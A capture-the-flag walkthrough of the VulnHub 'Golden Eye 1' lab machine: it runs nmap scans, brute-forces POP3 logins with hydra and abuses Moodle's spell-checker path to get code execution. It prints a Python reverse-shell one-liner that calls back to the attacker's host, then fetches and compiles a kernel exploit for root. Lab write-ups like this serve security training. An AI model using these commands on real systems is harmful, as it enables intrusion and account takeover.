> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/vulnhub/golden-eye-1.md).

# Golden Eye 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

```

```
nmap -p- -Pn 192.168.1.116 
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

```

We can see that there are 2 more unknown port that are on the server.

Let's put the IP on the web browser

![](/files/-M80mU0x_rRluYzvaOvd)

Let's navigate to `/sev-home`

![](/files/-M80n1-lKQk68lc-fl0Y)

Then if we go back to the main page and go to the inspect elements we can see a JavaScript file

![](/files/-M80nl-7jjXW1ZoXJa68)

We can see there is an encrypted password I copied it and paste it at google search bar then we got this surprisingly

![](/files/-M80uy0R3JkQ3SVWsQ1_)

Very obvious, the username is boris and we can login.

![](/files/-M80vHXpHgFia8G86oGq)

We can see that there is pop3 server running.

If we use nmap to enumerate both of the unknown ports&#x20;

```
nmap -sV -p 55006,55007 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

```

We know that 55007 is running pop3

## Exploitation

### Hydra

Then we can brute force to get the password of `boris` and `natalya`

```
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

```
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M80xtwCV16Ez8yFniDC)

![](/files/-M80yuU-2utL2baG_mjI)

Got the password! we can now login to the pop3 server

```
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3
```

![](/files/-M80zCW_opDG9CuuKJPm)

Nothing seems to be very interesting here, so we move on to the `natalya`

Doing the same thing as `boris`, we got something pretty interesting here

![](/files/-M80zlTmCSWD6k1SiO9R)

We got a credentials and we need to add the server IP to the /etc/hosts and navigate to `severnaya-station.com/gnocertdir`

After doing that, we can go to the browser and navigate to `severnaya-station.com/gnocertdir`

![](/files/-M811SAadFmusruBd4Ey)

We can login with the credentials he given

Then we can navigate to messages and we can see that the username is `doak`

![](/files/-M8122BvFJdb30jjvy-2)

Now we can take the username doak and brute force using hydra again

```
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M813PD_Bt6fulmj6emi)

We got the credentials, we then can go to back to the pop3 server and login&#x20;

![](/files/-M813zpGYh_oMxfLLRoT)

We got the credentials and we go back to the Moodle and login&#x20;

![](/files/-M814HhBHFsJGSDHwxoQ)

We then go to the private files and we have a s3cret.txt

![](/files/-M814Sg1yoeCcZSloCWa)

After cat the file out, we got this

![](/files/-M815P3HdLucoP26QQ7r)

We can see that the picture leads to the admin credentials&#x20;

We can see that there is a link in the file, if we follow the link,

![](/files/-M815ZENcv3iJ0UxxbsS)

If we download the picture and use strings command to list out all readable content, we will get this

![](/files/-M816K4qLuqLDQg-GAm6)

We can see that there is a base64 encrypted line.

After decode we got

![](/files/-M816UX7ooalZz4Vbc1h)

Let's login to the Moodle using the credentials we just got

![](/files/-M817wXvNDPzY1tJ0qe1)

After playing around, I found out that under site administration, Plugins, and Text Editor, there is a TinyMCE HTML editor

We need to change the Spell engine from Google Spell to PSpellShell

![](/files/-M818Rk730eblkM6kE-E)

Then, we go to the server and System Path, we can see that there is a Path to aspell section

### Reverse Shell

I tried using netcat but it doesn't work so we change the section to Python reverse shell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](/files/-M818aW4kd6el8xq5cw0)

Then we set up a listener at our machine&#x20;

```
nc -nlvp 4444
```

Then we can go to blog and add new entries

![](/files/-M81AF7hrJhImW8VjWYU)

After that click the spelling check to get the reverse shell

![](/files/-M81AKydMz7PtmiKxd30)

![](/files/-M81AOgAG-vWp-hI6yEp)

Then we can type a python command&#x20;

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Privilege Escalation

If we type `uname -a` , we can see that the kernal is out of date

![](/files/-M81BLKhkAMNVFjVxRdT)

We then can searchsploit the kernal..

![](/files/-M81BSwEeL52L4VB1A7m)

After that we can copy to our directory then I tried to transfer the file to the target machine but `gcc` is not available in the target machine but `cc` is available.

So we need to change something in the exploit

Change the `gcc` to `cc`

![](/files/-M81BmhYGlszbii6Kljc)

![](/files/-M81BrEMymU7sGNdf-Cx)

Then at our machine we can fire up the SimpleHTTPServer using Python

```
python -m SimpleHTTPServer
```

![](/files/-M81C7814oXEr_fhwcfi)

On the target machine navigate to `/tmp` directory and `wget` the file

![](/files/-M81CQpKnEqTqrUGKqUx)

Then we can type&#x20;

```
cc 37292.c -o exploit
chmod +x exploit
./exploit
```

![](/files/-M81CiBjFhq3U1hcljId)

Navigate to the `/root` and get the `.flag.txt`

![](/files/-M81CouHn-8k3kQkM9E5)

Then we can navigate to the URL it provided

![](/files/-M81D0ltZFjL8VaKGrMZ)

Congratulation !
